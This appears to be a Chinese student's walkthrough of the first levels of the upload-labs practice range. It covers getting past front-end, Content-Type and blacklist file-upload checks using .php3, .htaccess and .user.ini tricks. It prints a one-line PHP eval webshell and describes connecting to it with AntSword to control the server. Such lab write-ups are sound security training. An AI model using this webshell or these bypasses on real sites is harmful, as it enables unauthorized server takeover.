upload labs靶场

upload labs靶场

注意:本人关卡后面似乎相比正常的关卡少了一关,所以每次关卡名字都是+1才可以和正常关卡在同一关

一.个人信息

个人名称:张嘉玮

二.解题情况

三.解题过程

题目:up load labs靶场

pass 1前后端

思路及解题:先验证合法性是前端还是后端(如果是前端验证意味着你可以在前端验证之后后数据流发往后台的时候将其拦截并且修改)

题目中的提交限制必须为jpg等类型,需要判断这个提交是前端还是后端验证的,所以先打开抓包,并且发送一个不合法的php文件,提交,发现抓包并没有阻止页面显示文件上传格式错误,所以是前端验证。因此我直接将php文件类型重命名为jpg类型,提交文件前先抓包拦,再改变其中文件类型php为jpg,再forward,此时我已将木马发送到其内部,之后在下方图片中右键点击新标签页中打开图片,复制域名,打开蚁剑,右击添加数据,粘贴域名到url并且输入密码a,点击测试连接观察是否通过,若通过再添加,此时便可以控制对方了。

一句话木马

<?php
@eval($_POST_['a']);
?>

+++

pass 2前后端

1.思路:仍然是先看合法性是前端还是后端

我上传一个不合法的php文件并且用bp拦截,发现在拦截过程中页面未报错,所以是后端验证,不是前端,,之后判断拦截下的语句中哪句话是判断文件类型的,所以我继续先上传jpg,burp拦截后找到其中的Content-Type:image/jpeg然后删掉再forward,发现文件传输错误,所以它是通过content-type验证合法性的,之后我再上传一个php,拦截,将content-type:application/octet-stream改为image/jpeg之后forward则发送成功,蚁剑中添加数据后查看是否成功

+++

pass 3文件名加数字

(此题验证方式为黑名单,大部分网站是白名单)

思路及做法:查看源代码后发现其限制了php文件 但存在漏洞,未限制php3,4等格式;

所以直接将文件后缀名改为.php3等类型

+++

pass4配置文件

思路及做法:1.查看源码,发现其已限制大多数文件类型,但是有一个明显的漏洞,没有限制htacess文件,所以直接将文件后缀名改为.htacess就行了。

AddType application/x-httpd-php .jpg.txt意思就是将txt和.jpg文件当作php文件解析

2.所以接下来直接上传一个jpg文件类型的一句话木马就可以搞定了,再连接蚁剑测试是否成功.

+++

补充文件后缀名字

.htaccess

叫分布式配置文件 作用于网站根目录及其子目录 修改后立刻生效 可覆盖httod-conf

httpd -conf

(先加载)

包含apache http 作用于整个服务器 优先级低,需管理员权限 ,且重启服务器才可以生效

.user.ini

作用于用户或特定目录的配置文件,,可覆盖或追加配置选项,在web应用程序根目录下,可覆盖php.ini,追加全职配置文件

php.ini

(先加载)

作用是存储了对整个php环境生效的配置选项,通常位于php安装目录之下,优先级较低,需管理员权限和重启web服务器

+++

pass5配置文件

思路和做法:

仍然是有黑名单,限制了.htaccess,但是未限制.user.ini的,因为.user,.ini优先级程度高,可以覆盖掉php.ini,所以不限制的危害较大

Auto-prepend-file=index(2).txt   //此文件中有木马
    //自动包含所有文件 用index(2).txt包含

所以先上传

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值